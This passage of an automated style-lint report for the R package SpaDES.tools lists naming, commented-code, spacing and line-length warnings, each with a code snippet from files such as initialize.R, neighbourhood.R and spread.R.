^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:82:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L82) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( method != \"RMexp\") {\n        ^\n```\n[R/initialize.R:237:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  X <- c(jitter(sort(rbeta(nPoints, betaPar, betaPar) * (maxX - minX) + minX)),\n  ^\n```\n[R/initialize.R:239:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L239) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Y <- c(jitter(sort(rbeta(nPoints / 2, betaPar, betaPar) * (maxY - meanY) + meanY)),\n  ^\n```\n[R/initialize.R:243:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Sr1 <- Polygon(cbind(X + xAdd, Y + yAdd))\n  ^~~\n```\n[R/initialize.R:244:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L244) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Srs1 <- Polygons(list(Sr1), \"s1\")\n  ^~~~\n```\n[R/initialize.R:341:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L341) *style:* **Commented code should be removed.**\n```r\n​# ### INCORPORATE RELEVANT PARTS OF THIS OLD INIT FUNCTION INTO INITCOORDS()\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:346:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L346) *style:* **Commented code should be removed.**\n```r\n​# #'                      (currently only \\code{RasterLayer} or\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:347:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L347) *style:* **Commented code should be removed.**\n```r\n​# #'                      \\code{SpatialPolygonsDataFrame}) accepted.\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:357:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L357) *style:* **Commented code should be removed.**\n```r\n​#     ext <- extent(agentlocation)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:359:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L359) *style:* **Commented code should be removed.**\n```r\n​#       #            nonNAs <- !is.na(getvalue(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:360:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L360) *style:* **Commented code should be removed.**\n```r\n​#       nonNAs <- !is.na(getValues(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:361:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L361) *style:* **Commented code should be removed.**\n```r\n​#       wh.nonNAs <- which(nonNAs)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:362:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L362) *style:* **Commented code should be removed.**\n```r\n​#       #            ProbInit.v <- cumsum(getvalue(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:363:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L363) *style:* **Commented code should be removed.**\n```r\n​#       ProbInit.v <- cumsum(getValues(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:365:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L365) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:366:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L366) *style:* **Commented code should be removed.**\n```r\n​#         fI <- findInterval(ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:367:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L367) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[fI]\n          ^~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:368:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L368) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:369:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L369) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:370:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L370) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:372:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L372) *style:* **Commented code should be removed.**\n```r\n​#         #                va <- getvalue(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:373:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L373) *style:* **Commented code should be removed.**\n```r\n​#         va <- getValues(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:374:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L374) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(length(va), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:375:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L375) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:377:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L377) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(length(fI2), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:378:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L378) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v) + 1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:379:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L379) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:381:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L381) *style:* **Commented code should be removed.**\n```r\n​#         #                last.ran <- runif(length(fI2),0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:382:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L382) *style:* **Commented code should be removed.**\n```r\n​#         #                last.fI2 <- wh.nonNAs[last.ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:385:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L385) *style:* **Commented code should be removed.**\n```r\n​#         position <- xyFromCell(agentlocation,fI2,spatial = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:387:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L387) *style:* **Commented code should be removed.**\n```r\n​#         position <- coordinates(agentlocation)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:389:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L389) *style:* **Commented code should be removed.**\n```r\n​#         stop(\"need raster layer or Spatial Points object\")\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:391:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L391) *style:* **Commented code should be removed.**\n```r\n​#       numagents <- length(position)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:399:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L399) *style:* **Commented code should be removed.**\n```r\n​#           colnames(xy) = c(\"x\", \"y\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:400:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L400) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(xy)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:401:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L401) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(sampleRandom(agentlocation, numagents, xy = TRUE, sp = TRUE))\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:403:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L403) *style:* **Commented code should be removed.**\n```r\n​#           sam <- sample(1:length(agentlocation),numagents)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:404:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L404) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation[sam,])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:406:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L406) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:413:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L413) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:415:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L415) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:417:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L417) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:425:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L425) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:429:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L429) *style:* **Commented code should be removed.**\n```r\n​#     stop(\"Need to provide agentlocation, which can be a map layer\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:431:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L431) *style:* **Commented code should be removed.**\n```r\n​#   heading1 <- runif(numagents, 0, 360)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:432:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L432) *style:* **Commented code should be removed.**\n```r\n​#   distance <- runif(numagents, 0.1, 10)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:434:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L434) *style:* **Commented code should be removed.**\n```r\n​#   .Object@ID <- as.character(1:numagents)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:435:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L435) *style:* **Commented code should be removed.**\n```r\n​#   .Object@spatial <- position\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:436:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L436) *style:* **Commented code should be removed.**\n```r\n​#   .Object@heading <- heading1\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:437:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L437) *style:* **Commented code should be removed.**\n```r\n​#   .Object@distance <- distance\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:439:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/initialize.R#L439) *style:* **Commented code should be removed.**\n```r\n​#   return(.Object)\n    ^~~~~~~~~~~~~~~\n```\n[R/mapReduce.R:53:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/mapReduce.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  BsumVec <- reduced[fullRasterVals] # join\n  ^~~~~~~\n```\n[R/neighbourhood.R:112:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L112) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​adj.raw <- function(x = NULL, cells, directions = 8, sort = FALSE, pairs = TRUE,\n^~~~~~~\n```\n[R/neighbourhood.R:114:21:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                    ^~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:114:45:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                                            ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:233:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L233) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:238:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L238) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:297:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L297) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((from %% numCol + to %% numCol) == 1))# | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:813:29:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L813) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​setGeneric(\"wrap\", function(X, bounds, withHeading) {\n                            ^\n```\n[R/neighbourhood.R:822:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L822) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:839:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L839) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:849:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L849) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:850:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L850) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:859:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L859) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:860:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L860) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:869:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L869) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:872:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L872) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds))\n      ^\n```\n[R/neighbourhood.R:884:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L884) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:909:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L909) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:910:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L910) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:919:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L919) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:922:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L922) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:1059:40:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/neighbourhood.R#L1059) *style:* **Commas should always have a space after.**\n```r\n​  cc <- cbind(pureCircle2[, \"x\"] - xy[,\"x\"], pureCircle2[, \"y\"] - xy[, \"y\"])\n                                       ^\n```\n[R/probability.R:41:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/probability.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    1 / sqrt(var * 2 * pi) * exp(-((theta - mu + 2 * pi * k) ^ 2) / (2 * var))\n                                  ^\n```\n[R/probability.R:44:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/probability.R#L44) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Next <- term(theta, mu, var, k)\n  ^~~~\n```\n[R/probability.R:45:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/probability.R#L45) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Last <- Next\n  ^~~~\n```\n[R/RcppExports.R:68:20:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/RcppExports.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​runifC <- function(N) {\n                   ^\n```\n[R/RcppExports.R:71:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/RcppExports.R#L71) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/SELES.R:53:23:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/SELES.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​numAgents <- function(N, probInit) {\n                      ^\n```\n[R/spades-tools-deprecated.R:53:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spades-tools-deprecated.R#L53) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/splitRaster.R:116:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/splitRaster.R#L116) *style:* **Lines should not be more than 100 characters.**\n```r\n​      clusterApplyLB(cl = cl, x = seq_along(extents), fun = croppy, e = extents, r = r, path = path, rType = rType)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:538:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread.R#L538) *style:* **Commented code should be removed.**\n```r\n​      #isNASpreadProb <- is.na(spreadProb[])\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:540:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread.R#L540) *style:* **Commented code should be removed.**\n```r\n​      #   isNASpreadProb <- is.na(spreadProb[])\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:541:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread.R#L541) *style:* **Commented code should be removed.**\n```r\n​      #   spreadProb[isNASpreadProb] <- 0L\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:942:41:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread.R#L942) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​              notDupsEvents <- notDups[-(1:(nrSpreads - nrPotentials))]\n                                        ^\n```\n[R/spread2.R:5:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L5) *style:* **Lines should not be more than 100 characters.**\n```r\n​                           \"quantityAdj\", \"quantityAdj2\", \"state\", \"size\", \"tooBigByNCells\", \"V1\", \"proportion\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:674:12:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L674) *style:* **Commented code should be removed.**\n```r\n​          #pureCircle <- unique(pureCircle)\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:759:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/be771d9c34e5eda53aee0abf9c59938a81b578e8/R/spread2.R#L759) *style:* **Commented code should be removed.**\n```r\n​          # colnamesDtPot <- colnames(dtPotential)\n            